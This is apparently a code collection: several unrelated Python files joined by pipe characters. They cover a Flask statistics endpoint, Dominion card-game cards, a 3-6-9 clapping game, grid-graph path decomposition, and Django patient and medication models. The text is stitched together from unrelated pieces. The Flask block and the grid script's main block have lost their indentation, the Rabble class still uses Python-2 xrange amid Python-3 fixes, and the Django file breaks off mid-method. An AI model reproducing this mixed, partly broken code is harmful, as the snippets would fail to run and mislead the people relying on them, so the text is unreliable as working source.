range_dict["min_temp"] = stats.min_temp
range_dict["avg_temp"] = stats.avg_temp
range_dict["max_temp"] = stats.max_temp
range_stats.append(range_dict)
return jsonify(range_stats)
if __name__ == "__main__":
app.run(debug=True)
|
def distance_from_zero(number):
    """Print the absolute value of ``number`` if it is an int or float.

    Non-numeric input prints "Nope" instead.  bool is explicitly
    excluded to preserve the original ``type() ==`` behavior, which
    also rejected True/False.
    """
    # isinstance is the idiomatic type test; the bool exclusion keeps
    # behavior identical to the original exact-type comparison.
    if isinstance(number, (int, float)) and not isinstance(number, bool):
        positive = abs(number)
        print("The number :\n", positive, "true")
    else:
        print("Nope")
distance_from_zero("dfkk")
|
from cards_and_decks import *
from base_set import *
class Loan(Treasure):
    """Loan: $1 Treasure that digs up the next Treasure in the deck and
    lets the owner discard or trash it."""
    def cost(self):
        return 3
    def value(self):
        return 1
    def text(self):
        # FIX: corrected garbled wording ("Discard or it trash it.")
        return [
            "When you play this, reveal cards from your deck until you " + \
            "reveal a Treasure. Discard it or trash it. Discard the other cards."
        ]
    def discard_or_trash(self, pid, payload):
        # Resolve the owner's choice for the revealed Treasure (the
        # last card in self.revealed); everything before it is
        # discarded either way.
        if payload.get('discard'):
            self.deck.discard += self.revealed
        else:
            self.deck.discard += self.revealed[:-1]
            self.game.trash.append(self.revealed[-1])
        return {'clear': True}
    def preplay(self, payload):
        card = None
        self.revealed = []
        # Reveal from the top of the library until a Treasure turns up
        # or the library runs out.
        while True:
            card = self.deck.peek()
            if card is None:
                break
            self.revealed.append(self.deck.library.pop())
            if card.is_treasure():
                break
        if card is not None:
            # A Treasure was revealed: ask the owner what to do with it.
            self.game.add_callback(
                'discard_or_trash',
                self.discard_or_trash,
                [self.deck.player]
            )
        else:
            # BUG FIX: if the library emptied without revealing a
            # Treasure, the popped cards used to be lost in
            # self.revealed; discard them instead.
            self.deck.discard += self.revealed
        return {'revealed': [x.dict() for x in self.revealed]}
class TradeRoute(Reaction):
    """Trade Route: +1 Buy, +$1 per mat token, trash a card from hand."""
    def cost(self):
        return 3
    def text(self):
        return [
            "+1 Buy",
            "+$1 per token on the Trade Route mat.",
            "Trash a card from your hand.",
            "------",
            "Setup: Put a token on each Victory card Supply pile. When a " + \
            "card is gained from that pile, move the token to the Trade " + \
            "Route mat."
        ]
    def play(self, payload):
        chosen = payload.get('card')
        if not isinstance(chosen, dict):
            return {'error': 'Invalid trash card.'}
        trashed = self.deck.trash_hand(chosen)
        if trashed is None:
            return {'error': 'Card {0} not in hand'.format(chosen.get('name'))}
        self.game.add_buys(1)
        # one coin per distinct Victory pile bought from so far
        self.game.add_money(len(self.game.victories_gained))
        return {}
class Watchtower(Reaction):
    """Watchtower: draw up to 6 cards; as a reaction, trash or top-deck
    any card you gain."""
    def cost(self):
        return 3
    def reacts_to(self):
        # triggers whenever the owner gains a card
        return ['gain']
    def react(self, pid, payload):
        # Owner's choice for the gained card: trash it, put it on top
        # of the library, or (neither flag set) leave it in the discard.
        deck = self.game.players[pid].deck
        if self.gained in deck.discard:
            if payload.get('trash'):
                self.game.trash.append(self.gained)
                deck.discard.remove(self.gained)
            elif payload.get('put_top'):
                deck.library.append(self.gained)
                deck.discard.remove(self.gained)
            return {'clear': True}
        # NOTE(review): when the gained card is no longer in the
        # discard pile this falls through and returns None (the
        # callback is not cleared) -- confirm that is intended.
    def register_reaction(self, pid, card):
        # Remember the gained card and queue the owner's decision.
        # NOTE(review): a second gain before this resolves overwrites
        # self.gained -- confirm gains resolve one at a time.
        self.gained = card
        self.game.queue_callback(
            'watchtower:{0}'.format(card.name()),
            self.react,
            [self.game.players[pid]]
        )
    def text(self):
        return [
            "Draw until you have 6 cards in hand.",
            "When you gain a card, you may reveal this from your hand. If " + \
            "you do, either trash that card, or put it on top of your deck.",
        ]
    def play(self, payload):
        # draw up to a 6-card hand; stop early if the deck runs dry
        while len(self.deck.hand) < 6:
            if not self.deck.draw():
                break
        return {}
class Bishop(Action):
    """Bishop: +$1, +1 VP token; trash a card for VP tokens equal to
    half its cost (rounded down); each other player may also trash."""
    def cost(self):
        return 4
    def text(self):
        return [
            "+$1",
            "+1 VP token",
            "Trash a card from your hand. +VP tokens equal to half its cost " + \
            "in coins, rounded down. Each other player may trash a card " + \
            "from his hand."
        ]
    def maybe_trash(self, pid, payload, gain_vp=False):
        """Trash the card named in payload from pid's hand; when
        gain_vp is set, award floor(cost / 2) VP tokens."""
        if 'card' not in payload:
            return {'error': 'Parameter card is required.'}
        card = payload['card']
        if not isinstance(card, dict):
            return {'error': 'Card is invalid.'}
        deck = self.game.players[pid].deck
        c = deck.trash_hand(card)
        if c is None:
            return {'error': 'Card {0} not found in hand'.format(card.get('name'))}
        if gain_vp:
            # BUG FIX: use floor division -- under Python 3 `/` is true
            # division and would award fractional VP for odd costs; the
            # card text says "rounded down".
            self.game.players[pid].victory_tokens += c.cost() // 2
        return {'clear': True}
    def play(self, payload):
        result = self.maybe_trash(self.deck.player.id, payload, True)
        if 'error' in result:
            return result
        # BUG FIX: the card text grants +$1 and +1 VP token, neither of
        # which the original play() awarded.
        self.game.add_money(1)
        self.deck.player.victory_tokens += 1
        self.game.add_callback(
            'maybe_trash',
            self.maybe_trash,
            self.game.opponents()
        )
        return result
class Monument(Action):
    """Monument: +$2 and one victory-point token for its owner."""
    def cost(self):
        return 4
    def text(self):
        return [
            "+$2",
            "+1 VP token."
        ]
    def play(self, payload):
        # Money and token grants are independent of each other.
        self.game.add_money(2)
        self.deck.player.victory_tokens += 1
        return {}
class Quarry(Treasure):
    """Quarry: $1 Treasure; Action cards cost $2 less while in play."""
    def cost(self):
        return 4
    def value(self):
        return 1
    def text(self):
        return [
            "While this is in play, Action cards cost $2 less, but " + \
            "not less than $0."
        ]
    def discount(self, card, cost):
        # Only Action cards are discounted, and never below zero.
        reduced = cost - 2 if card.is_action() else cost
        return max(reduced, 0)
    def preplay(self, payload):
        # Register the discount hook on the owner.
        self.deck.player.discounts.append(self.discount)
        return {}
class Talisman(Treasure):
    """Talisman: $1 Treasure; cheap non-Victory buys are duplicated."""
    def cost(self):
        return 4
    def value(self):
        return 1
    def text(self):
        return [
            "While this is in play, when you buy a card costing $4 or " + \
            "less that is not a Victory card, gain a copy of it."
        ]
    def effect(self, bought):
        # Gain a second copy of the card that was just bought.
        self.game.gain(self.deck, bought.name())
    def preplay(self, payload):
        # Fires on buys of non-Victory cards whose (discounted) cost
        # is at most $4.
        def _qualifies(c):
            return c.effective_cost(self.deck.player) <= 4 and not c.is_victory()
        self.game.on_buy(_qualifies, self.effect)
        return {}
class WorkersVillage(Action):
    """Worker's Village: +1 Card, +2 Actions, +1 Buy."""
    def cost(self):
        return 4
    def text(self):
        return [
            "+1 Card",
            "+2 Actions",
            "+1 Buy",
        ]
    def play(self, payload):
        # Draw first; the action and buy grants are order-independent.
        self.deck.draw()
        self.game.add_buys(1)
        self.game.add_actions(2)
        return {}
class City(Action):
    """City: +1 Card, +2 Actions; grows stronger as Supply piles empty."""
    def cost(self):
        return 5
    def text(self):
        return [
            "+1 Card",
            "+2 Actions",
            "If there are one or more empty Supply piles, +1 Card. " + \
            "If there are two or more, +$1 and +1 Buy."
        ]
    def play(self, payload):
        empties = self.game.empty_stacks
        self.deck.draw()
        if empties >= 1:
            # one empty pile: a second card
            self.deck.draw()
        self.game.add_actions(2)
        if empties >= 2:
            # two empty piles: a coin and a buy as well
            self.game.add_money(1)
            self.game.add_buys(1)
        return {}
class Contraband(Treasure):
    """Contraband: $3 Treasure, +1 Buy; the player to your left names a
    card you cannot buy this turn."""
    def cost(self):
        return 5
    def value(self):
        return 3
    def text(self):
        return [
            "+1 Buy",
            "When you play this, the player to your left names a card. " + \
            "You can't buy that card this turn.",
        ]
    def name_contraband(self, pid, payload):
        """Record the card the opponent named as unbuyable this turn."""
        card = payload.get('card')
        if not isinstance(card, dict):
            return {'error': 'Invalid card chosen.'}
        if not self.game.active_player.add_contraband(card):
            return {'error': 'No such card {0}'.format(card.get('name'))}
        return {'clear': True}
    def preplay(self, payload):
        # BUG FIX: the card text grants +1 Buy, which the original
        # never awarded (other cards grant buys explicitly).
        self.game.add_buys(1)
        # Only the player to the left (first opponent) names a card.
        self.game.add_callback(
            'name_contraband',
            self.name_contraband,
            self.game.opponents()[0:1]
        )
        return {}
class CountingHouse(Action):
    """Counting House: move a chosen number of Coppers from the discard
    pile into the hand."""
    def cost(self):
        return 5
    def text(self):
        return [
            "Look through your discard pile, reveal any number of Copper " + \
            "cards from it, and put them into your hand."
        ]
    def play(self, payload):
        """Move payload['count'] Coppers from discard to hand."""
        if 'count' not in payload:
            return {'error': 'Parameter count required.'}
        count = payload['count']
        if not isinstance(count, int):
            return {'error': 'Parameter count must be an int.'}
        coppers = [x for x in self.deck.discard if x.name() == 'Copper']
        if len(coppers) < count:
            return {'error': 'You do not have that many coppers in your discard.'}
        # FIX: range() instead of the Python-2-only xrange(); identical
        # behavior, but keeps the module importable on Python 3.
        for i in range(count):
            self.deck.hand.append(coppers[i])
            self.deck.discard.remove(coppers[i])
        return {}
class Mint(Action):
    """Mint: gain a copy of a revealed Treasure from hand; buying Mint
    trashes every Treasure in play."""
    def cost(self):
        return 5
    def text(self):
        return [
            "You may reveal a Treasure card from your hand. Gain a copy of " + \
            "it. When you buy this, trash all Treasures you have in play."
        ]
    def on_buy(self):
        # BUG FIX: the original removed cards from tmp_zone while
        # iterating over it, which skips the element following each
        # removal (e.g. two adjacent Treasures); iterate over a copy.
        for card in list(self.deck.tmp_zone):
            if card.is_treasure():
                self.game.trash.append(card)
                self.deck.tmp_zone.remove(card)
        return {}
    def play(self, payload):
        card = payload.get('card')
        if not isinstance(card, dict):
            return {'error': 'Invalid card chosen.'}
        c = self.deck.find_card_in_hand(card)
        if c is None:
            return {'error': 'Card {0} not in hand.'.format(card.get('name'))}
        # BUG FIX: per the card text only a Treasure may be copied; the
        # original accepted any card in hand.
        if not c.is_treasure():
            return {'error': 'Card {0} is not a Treasure.'.format(card.get('name'))}
        self.game.gain(self.deck, card.get('name'))
        return {}
class Mountebank(Attack):
    """Mountebank: +$2; each other player discards a Curse or gains a
    Curse and a Copper."""
    def cost(self):
        return 5
    def text(self):
        return [
            "+$2",
            "Each other player may discard a Curse. If he doesn't, he " + \
            "gains a Curse and a Copper.",
        ]
    def preplay(self, payload):
        # BUG FIX: this previously called add_buys(2); Mountebank's
        # text grants no buys (its +$2 is awarded in attack() below).
        return {}
    def discard_curse(self, pid, payload):
        # Victim callback: discard a Curse, or gain Curse + Copper.
        deck = self.game.players[pid].deck
        if payload.get('discard'):
            c = deck.discard_hand({'name': 'Curse'})
            if c is None:
                return {'error': 'No Curse to discard.'}
        else:
            self.game.gain(deck, 'Curse')
            self.game.gain(deck, 'Copper')
        return {'clear': True}
    def attack(self, players):
        self.game.add_money(2)
        self.game.add_callback("discard_curse", self.discard_curse, players)
class Rabble(Attack):
    """Rabble: +3 Cards; each other player reveals 3 cards, discards
    the Actions/Treasures, and re-stacks the rest in chosen order."""
    def cost(self):
        return 5
    def text(self):
        return [
            "+3 Cards",
            "Each other player reveals the top 3 cards of his deck, " + \
            "discards the revealed Actions and Treasures, and puts the " + \
            "rest back on top in any order he chooses.",
        ]
    def preplay(self, payload):
        self.deck.draw(3)
        return {}
    def choose_order(self, pid, payload):
        # Victim callback: payload['cards'] must name every kept card
        # in self.revealed[pid], in the order they go back on top.
        if not isinstance(payload.get('cards'), list):
            return {'error': 'Cards must be list.'}
        cards = []
        revealed = self.revealed[pid]
        if len(revealed) != len(payload['cards']):
            return {'error': 'Must reorder all cards.'}
        for card in payload['cards']:
            if not isinstance(card, dict):
                # roll back: return already-matched cards to revealed
                revealed += cards
                return {'error': 'Invalid card.'}
            matching = [x for x in revealed if x.name() == card.get('name')]
            if not matching:
                revealed += cards
                return {'error': 'Card not in revealed cards.'}
            cards.append(matching[0])
            revealed.remove(matching[0])
        # appending to library == placing on top of the deck
        self.game.players[pid].deck.library += cards
        return {'clear': True}
    def attack(self, players):
        self.revealed = {}
        for player in players:
            deck = player.deck
            cards = []
            # take up to 3 cards off the top of the victim's library
            for i in xrange(3):
                c = deck.peek()
                if c is None:
                    break
                cards.append(deck.library.pop())
            discarded = []
            new_cards = []
            for card in cards:
                if card.is_treasure() or card.is_action():
                    discarded.append(card)
                else:
                    new_cards.append(card)
            deck.discard += discarded
            # the kept cards wait for the player's choose_order reply
            self.revealed[player.id] = new_cards
            self.game.log.append({
                'pid': player.id,
                'action': 'reveal_top_3',
                'revealed': [x.dict() for x in new_cards],
                'discarded': [x.dict() for x in discarded],
            })
        self.game.add_callback('choose_order', self.choose_order, players)
class RoyalSeal(Treasure):
    """Royal Seal: $2 Treasure; gained cards may go on top of the deck."""
    def cost(self):
        return 5
    def value(self):
        return 2
    def text(self):
        return [
            "While this is in play, when you gain a card, you may put that " + \
            "card on top of your deck."
        ]
    def put_top(self, pid, payload):
        # Player callback: optionally move the just-gained card from
        # the discard pile to the top of the library.
        if payload.get('put_top'):
            deck = self.game.players[pid].deck
            if self.bought in deck.discard:
                deck.library.append(self.bought)
                deck.discard.remove(self.bought)
        return {'clear': True}
    def effect(self, card):
        # NOTE(review): only the most recent gain is remembered; a
        # second gain before the callback resolves overwrites
        # self.bought -- confirm gains resolve one at a time.
        self.bought = card
        self.game.add_callback('put_top', self.put_top, [self.game.active_player])
    def preplay(self, payload):
        # every gain of any card triggers the offer
        self.game.on_gain(lambda x: True, self.effect)
        return {}
class Vault(Action):
    """Vault: +2 Cards; discard for +$1 each; opponents may discard 2
    cards to draw 1."""
    def cost(self):
        return 5
    def text(self):
        return [
            "+2 Cards",
            "Discard any number of cards. +$1 per card discarded. Each " + \
            "other player may discard 2 cards. If he does, he draws a card.",
        ]
    def cycle(self, pid, payload):
        # Opponent callback: discard exactly 2 cards to draw 1, or
        # decline by sending an empty list.
        if not isinstance(payload.get('cards'), list):
            return {'error': 'Cards must be list.'}
        if not payload['cards']:
            return {'clear': True}
        if len(payload['cards']) != 2:
            return {'error': 'Must discard exactly 2 cards, or none.'}
        deck = self.game.players[pid].deck
        cards = []
        for card in payload['cards']:
            if not isinstance(card, dict):
                # roll back cards already removed from the hand
                deck.hand += cards
                return {'error': 'Invalid card'}
            c = deck.find_card_in_hand(card)
            if c is None:
                deck.hand += cards
                return {'error': 'Card {0} not in hand'.format(card.get('name'))}
            cards.append(c)
            deck.hand.remove(c)
        deck.discard += cards
        deck.draw()
        return {'clear': True}
    def discard_cards(self, pid, payload):
        # Active-player callback: discard any number, +$1 per card.
        if not isinstance(payload.get('cards'), list):
            return {'error': 'Cards must be list.'}
        deck = self.game.players[pid].deck
        cards = []
        for card in payload['cards']:
            if not isinstance(card, dict):
                # roll back cards already removed from the hand
                deck.hand += cards
                return {'error': 'Invalid card'}
            c = deck.find_card_in_hand(card)
            if c is None:
                deck.hand += cards
                return {'error': 'Card {0} not in hand'.format(card.get('name'))}
            cards.append(c)
            deck.hand.remove(c)
        deck.discard += cards
        self.game.add_money(len(cards))
        return {'clear': True}
    def play(self, payload):
        self.deck.draw(2)
        self.game.add_callback('discard_cards', self.discard_cards, [self.game.active_player])
        self.game.add_callback('cycle', self.cycle, self.game.opponents())
        return {}
class Venture(Treasure):
    """Venture: $1 Treasure; digs up and immediately plays the next
    Treasure in the deck."""
    def cost(self):
        return 5
    def value(self):
        return 1
    def text(self):
        return [
            "When you play this, reveal cards from your deck until you " + \
            "reveal a Treasure. Discard the other cards. Play that Treasure."
        ]
    def preplay(self, payload):
        revealed = []
        # flip cards until a Treasure turns up or the deck runs out
        while True:
            c = self.deck.peek()
            if c is None:
                break
            self.deck.library.pop()
            if c.is_treasure():
                # found one: move it to the play area and play it
                self.deck.tmp_zone.append(c)
                self.game.log.append({
                    'pid': self.game.active_player.id,
                    'action': 'venture',
                    'played': c.dict(),
                })
                c.play({})
                break
            revealed.append(c)
        # everything revealed before the Treasure is discarded
        self.deck.discard += revealed
        return {}
class Goons(Militia):
    """Goons: +1 Buy, +$2, the Militia discard attack; each buy while
    it is in play earns a VP token."""
    def cost(self):
        return 6
    def text(self):
        return [
            "+1 Buy",
            "+$2",
            "Each other player discards down to 3 cards in hand. " + \
            "While this is in play, when you buy a card, +1 VP token.",
        ]
    def effect(self, _card):
        # Every purchase while Goons is in play yields one VP token.
        self.game.active_player.victory_tokens += 1
    def preplay(self, payload):
        self.game.add_buys(1)
        self.game.add_money(2)
        # register for every subsequent buy this turn
        self.game.on_buy(lambda _c: True, self.effect)
        return {}
class GrandMarket(Action):
    """Grand Market: +1 Card, +1 Action, +1 Buy, +$2; cannot be bought
    while a Copper is in play."""
    def cost(self):
        return 6
    def text(self):
        return [
            "+1 Card",
            "+1 Action",
            "+1 Buy",
            "+$2",
            "You can't buy this if you have any Copper in play.",
        ]
    def on_buy(self):
        # The purchase is vetoed whenever a Copper sits in the play area.
        if self.deck.find_card_in_tmp_zone({'name': 'Copper'}) is not None:
            return {'error': 'Cannot buy Grand Market when Copper in play.'}
        return {}
    def play(self, payload):
        self.deck.draw()
        self.game.add_actions(1)
        self.game.add_buys(1)
        self.game.add_money(2)
        return {}
class Hoard(Treasure):
    """Hoard: $2 Treasure; buying a Victory card also gains a Gold."""
    def cost(self):
        return 6
    def value(self):
        return 2
    def text(self):
        return [
            "While this is in play, when you buy a Victory card, gain a Gold."
        ]
    def effect(self, _bought):
        self.game.gain(self.deck, 'Gold')
    def preplay(self, payload):
        # trigger only when the bought card is a Victory card
        def _is_victory(c):
            return c.is_victory()
        self.game.on_buy(_is_victory, self.effect)
        return {}
class Bank(Treasure):
    """Bank: worth $1 per Treasure in play (itself included)."""
    def cost(self):
        return 7
    def value(self):
        # Worth nothing while not attached to a deck.
        if not self.deck:
            return 0
        return sum(1 for played in self.deck.tmp_zone if played.is_treasure())
    def text(self):
        return [
            "When you play this, it's worth $1 per Treasure card you " + \
            "have in play (counting this)."
        ]
class Expand(Remodel):
    """Remodel variant costing $7."""
    def __init__(self, game):
        # The 3 is forwarded to Remodel -- presumably the extra-cost
        # allowance for the gained card; confirm against Remodel.__init__.
        super(Expand, self).__init__(game, 3)
    def cost(self):
        return 7
class Forge(Action):
    """Forge: trash any number of hand cards; gain a card costing
    exactly the sum of the trashed cards' costs."""
    def cost(self):
        return 7
    def text(self):
        return [
            "Trash any number of cards from your hand. Gain a card with " + \
            "cost exactly equal to the total cost in coins of the trashed cards."
        ]
    def play(self, payload):
        # Validate all inputs up front so nothing is half-applied.
        if 'cards' not in payload:
            return {'error': 'No cards to trash.'}
        if not isinstance(payload['cards'], list):
            return {'error': 'Cards must be list.'}
        if 'gain' not in payload:
            return {'error': 'No card gained.'}
        gain = payload['gain']
        if not isinstance(gain, dict):
            return {'error': 'Gained card invalid.'}
        name = gain.get('name')
        gained = self.game.card_from_name(name)
        if gained is None:
            return {'error': 'No such card {0}'.format(name)}
        total_cost = 0
        cards = []
        for card in payload['cards']:
            if not isinstance(card, dict):
                # roll back cards already pulled from the hand
                self.deck.hand += cards
                return {'error': 'Invalid card'}
            c = self.deck.find_card_in_hand(card)
            if c is None:
                self.deck.hand += cards
                return {'error': 'Card {0} not in hand'.format(card.get('name'))}
            # NOTE(review): sums the printed cost, not any discounted
            # effective cost -- confirm that is the intended rule.
            total_cost += c.cost()
            cards.append(c)
            self.deck.hand.remove(c)
        if gained.cost() != total_cost:
            self.deck.hand += cards
            return {'error': 'Gained card must have equal cost to sum of trashed cards.'}
        c = self.game.gain(self.deck, name)
        if c is None:
            self.deck.hand += cards
            return {'error': 'Could not gain {0}'.format(name)}
        self.game.trash += cards
        return {}
class KingsCourt(ThroneRoom):
    """Throne Room variant costing $7."""
    def __init__(self, game):
        # The 2 is forwarded to ThroneRoom -- presumably the number of
        # extra plays granted; confirm against ThroneRoom.__init__.
        super(KingsCourt, self).__init__(game, 2)
    def cost(self):
        return 7
class Peddler(Action):
    """Peddler: +1 Card, +1 Action, +$1; costs $2 less per Action in
    play during the Buy phase (never below $0)."""
    def cost(self):
        base = 8
        if not self.game.active_deck:
            return base
        # each Action card in the play area knocks $2 off the price
        actions_in_play = sum(
            1 for c in self.game.active_deck.tmp_zone if c.is_action()
        )
        return max(base - 2 * actions_in_play, 0)
    def text(self):
        return [
            "+1 Card",
            "+1 Action",
            "+$1",
            "During your Buy phase, this costs $2 less per Action card " + \
            "you have in play, but not less than $0."
        ]
    def play(self, payload):
        self.deck.draw()
        self.game.add_actions(1)
        self.game.add_money(1)
        return {}
class Platinum(Treasure):
    """Platinum: costs $9, worth $5 when played."""
    def value(self):
        return 5
    def cost(self):
        return 9
class Colony(Victory):
    """Colony: costs $11, scores 10 victory points."""
    def points(self):
        return 10
    def cost(self):
        return 11
|
def main():
    """Play the 3-6-9 clapping game for the numbers 1..100.

    A number whose tens digit is exactly 3, 6 or 9 prints a triple
    clap; otherwise a ones digit of 3, 6 or 9 prints a double clap;
    anything else prints the number.  (As in the original elif chain,
    each number produces exactly one line.)
    """
    number = 0
    while number < 100:
        number = number + 1
        # BUG FIX: `number / 10 == 3` is true division in Python 3, so
        # only the exact multiples 30/60/90 matched; floor division
        # makes the whole decade (30-39, 60-69, 90-99) clap.
        if number // 10 == 3:
            print("짝!!!")
        elif number // 10 == 6:
            print("짝!!!")
        elif number // 10 == 9:
            print("짝!!!")
        elif number % 10 == 3:
            print("짝!!")
        elif number % 10 == 6:
            print("짝!!")
        elif number % 10 == 9:
            print("짝!!")
        else:
            print(number)
if __name__ == "__main__":
    main()
|
import sys
import numpy as np
from numpy.lib.function_base import delete
def gridToGraph(n, m):
    """Build an n x m grid graph.

    Returns (vertex ids, sorted undirected edge list, matrix of ids).
    """
    # Coordinates in column-major order, so ids increase down columns.
    coords = [(i, j) for j in range(m) for i in range(n)]
    # map each coordinate to a vertex id 0..n*m-1
    names = {coords[v]: v for v in range(len(coords))}
    vertices = list(names.values())
    gridVer = np.zeros((n, m), dtype=int)
    edges = []
    for (r, c) in coords:
        here = names[(r, c)]
        if (r + 1) < n:
            # edge to the cell below
            below = names[(r + 1, c)]
            edges.append((here, below))
            gridVer[r + 1, c] = below
        if (c + 1) < m:
            # edge to the cell to the right
            right = names[(r, c + 1)]
            edges.append((here, right))
            gridVer[r, c + 1] = right
    return vertices, sorted(edges), gridVer
def adjMatrix(vertices, edges):
    """Dense symmetric adjacency matrix for an undirected graph.

    :param vertices: list of vertex ids
    :param edges: list of (u, v) pairs
    """
    N = len(vertices)
    # np.zeros is clearer (and far cheaper) than building an N x N
    # Python list-of-lists and converting it.
    adj = np.zeros((N, N), dtype=int)
    for u, v in edges:
        # undirected: mark both directions
        adj[u][v] = 1
        adj[v][u] = 1
    return adj
class Node:
    # A node of the path decomposition chain built by
    # decomposeGridGraph2: `type` is "introduce" or "forget", `bag`
    # holds vertex ids, and `child` links to the next node.
    def __init__(self, type):
        self.type = type
        self.bag = []
        self.child = None
# def decomposeGridGraph(a):
# aT = a.T
# T = []
# for i in range(len(aT)):
# t = []
# if i > 0: t.extend(aT[i-1])
# t.extend(aT[i])
# T.append(t)
# return T
def decomposeGridGraph2(a, adj):
    """Build and print a path decomposition of a grid graph.

    :param a: matrix of vertex ids (as produced by gridToGraph)
    :param adj: adjacency matrix of the graph
    Walks the grid column by column, growing an "introduce" bag one
    vertex at a time; whenever the bag contains a vertex not adjacent
    to the newcomer, a "forget" node drops it from the bag.
    """
    aT = a.T
    root = Node("introduce")
    node = root
    for i in range(len(aT)):
        for j in range(len(aT[i])):
            w = aT[i, j]
            node.bag.append(w)
            for x in node.bag:
                if x != w and adj[w, x] == 0:
                    # x is no longer adjacent to the new vertex: forget it
                    childForget = Node("forget")
                    childForget.bag.extend([v for v in node.bag if v != x])
                    node.child = childForget
                    node = childForget
                    break
            # FIX: removed a stray no-op expression (`adj[i,j]`) that
            # evaluated an array element and discarded the result.
            childIntro = Node("introduce")
            childIntro.bag.extend(node.bag)
            node.child = childIntro
            node = childIntro
    # dump the resulting chain for inspection
    n = root
    i = 1
    while n != None:
        print(i, n.type, n.bag)
        n = n.child
        i += 1
if __name__ == "__main__":
vertices, edges, gridVer = gridToGraph(4,3)
print(gridVer)
adj = adjMatrix(vertices, edges)
# print(edges)
# print(adj)
# a =np.array([[11,12,13],[21,22,23],[31,32,33],[41,42,43]])
# print(a)
# print()
# # print("Decomposed graph")
# # print(decomposeGridGraph(a))
# # print()
decomposeGridGraph2(gridVer, adj.T) |
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
import string
import random
from utils import str_to_date
class Doctor(models.Model):
    """Per-doctor profile attached 1:1 to an auth User.

    `token` is an opaque credential string (purpose not visible here);
    `current_patient_id` tracks the patient currently selected, if any.
    """
    user = models.OneToOneField(User, primary_key=True)
    token = models.CharField(max_length=200)
    current_patient_id = models.IntegerField(null=True, blank=True)
    def set_random_password(self):
        """Assign the linked user a random 20-char password; return it.

        SECURITY FIX: uses random.SystemRandom (os.urandom-backed)
        instead of the default Mersenne-Twister PRNG, whose output is
        predictable and unsuitable for secrets.  Also uses
        string.ascii_letters instead of the Python-2-only,
        locale-dependent string.letters.
        """
        user = self.user
        all_chars = string.ascii_letters + string.digits + string.punctuation
        rng = random.SystemRandom()
        password = ''.join(rng.choice(all_chars) for x in range(20))
        user.set_password(password)
        user.save()
        return password
class Patient(models.Model):
    """Demographic, contact, employer and billing-contact information
    for a patient; owned by a doctor's auth User."""
    doctor = models.ForeignKey(User)
    first_name = models.CharField(max_length=200, blank=True)
    middle_name = models.CharField(max_length=200, null=True, blank=True)
    last_name = models.CharField(max_length=200, blank=True)
    address = models.CharField(max_length=200, blank=True)
    email = models.CharField(max_length=200, blank=True)
    home_phone = models.CharField(max_length=14, blank=True)
    cell_phone = models.CharField(max_length=14, blank=True)
    city = models.CharField(max_length=200, blank=True)
    # emergency contact
    emergency_contact_name = models.CharField(max_length=200, blank=True)
    emergency_contact_phone = models.CharField(max_length=200, blank=True)
    emergency_contact_relation = models.CharField(max_length=200, blank=True)
    # employer details
    employer = models.CharField(max_length=200, blank=True)
    employer_city = models.CharField(max_length=200, blank=True)
    employer_address = models.CharField(max_length=200, blank=True)
    employer_state = models.CharField(max_length=200, blank=True)
    employer_zip_code = models.CharField(blank=True, max_length=200)
    primary_care_physician = models.CharField(
        max_length=200, blank=True, null=True
    )
    zip_code = models.CharField(max_length=5, blank=True, null=True)
    state = models.CharField(max_length=2, blank=True, null=True)
    social_security_number = models.CharField(max_length=20, blank=True)
    # responsible (billing) party
    responsible_party_name = models.CharField(max_length=200, blank=True)
    responsible_party_phone = models.CharField(max_length=14, blank=True)
    responsible_party_relation = models.CharField(max_length=200, blank=True)
    responsible_party_email = models.CharField(max_length=200, blank=True)
    def __str__(self):
        return "{0}, {1}".format(self.last_name, self.first_name)
    @classmethod
    def column_list(cls):
        # Field-name list used by callers elsewhere.  NOTE(review):
        # employer_zip_code is defined on the model but missing here --
        # confirm whether that omission is intentional.
        cols = ['doctor', 'first_name', 'middle_name', 'last_name', 'address',
                'email', 'home_phone', 'cell_phone', 'city', 'zip_code',
                'emergency_contact_name', 'emergency_contact_phone', 'state',
                'emergency_contact_relation', 'employer', 'employer_city',
                'employer_state', 'employer_address', 'primary_care_physician',
                'social_security_number', 'responsible_party_name',
                'responsible_party_phone', 'responsible_party_relation',
                'responsible_party_email']
        return cols
class Problem(models.Model):
    """A medical problem/diagnosis recorded against a patient."""
    # on_delete made explicit; CASCADE matches the pre-Django-2.0 default.
    patient = models.ForeignKey(Patient, on_delete=models.CASCADE)
    date_changed = models.DateField(null=True, blank=True)
    date_diagnosis = models.DateField(null=True, blank=True)
    date_onset = models.DateField(null=True, blank=True)
    description = models.TextField(blank=True)
    name = models.CharField(max_length=200, blank=True)
    notes = models.TextField(blank=True)
    status = models.CharField(max_length=200, blank=True)

    def __str__(self):
        """Problems are identified by their name."""
        return self.name

    def set_additional_attrs(self, request):
        """Populate patient and date fields from the incoming request.

        Uses the doctor's currently selected patient and the POSTed date
        strings; raises KeyError if the expected POST fields are absent.
        """
        self.set_patient(request.user.doctor.current_patient_id)
        self.set_dates(request.POST)

    def set_patient(self, patient_id):
        """Attach the Patient with the given primary key to this problem."""
        patient = Patient.objects.get(pk=patient_id)
        self.patient = patient

    def set_dates(self, data):
        """Parse onset/diagnosis date strings via the module-level str_to_date helper."""
        self.date_onset = str_to_date(data['date_onset'])
        self.date_diagnosis = str_to_date(data['date_diagnosis'])
class Medication(models.Model):
    """A medication prescribed by a doctor for a patient."""
    # on_delete made explicit on both FKs; CASCADE matches the pre-Django-2.0
    # default, so behavior is unchanged.
    doctor = models.ForeignKey(User, on_delete=models.CASCADE)
    patient = models.ForeignKey(Patient, on_delete=models.CASCADE)
    daw = models.BooleanField()  # presumably "dispense as written" — confirm
    name = models.CharField(max_length=200)
    prn = models.BooleanField()  # presumably "as needed" (pro re nata) — confirm
    date_prescribed = models.DateField(null=True, blank=True)
    date_started_taking = models.DateField(null=True, blank=True)
    date_stopped_taking = models.DateField(null=True, blank=True)
    dispense_quantity = models.FloatField(null=True, blank=True)
    dosage_quantity = models.FloatField(null=True, blank=True)
    notes = models.TextField(blank=True)
    frequency = models.CharField(max_length=200, blank=True)
    number_refills = models.IntegerField(blank=True, null=True)
    order_status = models.CharField(max_length=200, blank=True, null=True)
    status = models.CharField(max_length=200, blank=True)

    def __str__(self):
        """Medications are identified by their name."""
        return self.name

    def set_additional_attrs(self, request):
        """Populate doctor, patient and date fields from the incoming request."""
        self.doctor = request.user
        self.set_patient(request.user.doctor.current_patient_id)
        self.set_dates(request.POST)

    def set_patient(self, patient_id):
        """Attach the Patient with the given primary key to this medication."""
        patient = Patient.objects.get(pk=patient_id)
        self.patient = patient

    def set_dates(self, data):
